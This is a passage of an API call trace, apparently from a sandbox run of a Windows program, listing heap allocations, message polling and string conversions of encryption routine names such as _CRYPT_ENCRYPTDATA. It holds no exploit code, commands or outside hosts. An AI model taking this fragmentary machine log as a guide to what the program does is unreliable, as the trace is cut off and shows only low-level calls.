Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.770] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.770] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x121b4) returned 0x89ffb8 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0030.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x121b4) returned 0x8c4338 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.772] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0030.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.772] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.772] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.772] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.773] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.773] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.773] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.773] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.774] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.774] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.774] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.774] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.775] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.775] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.775] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.776] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.776] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.776] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0030.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: 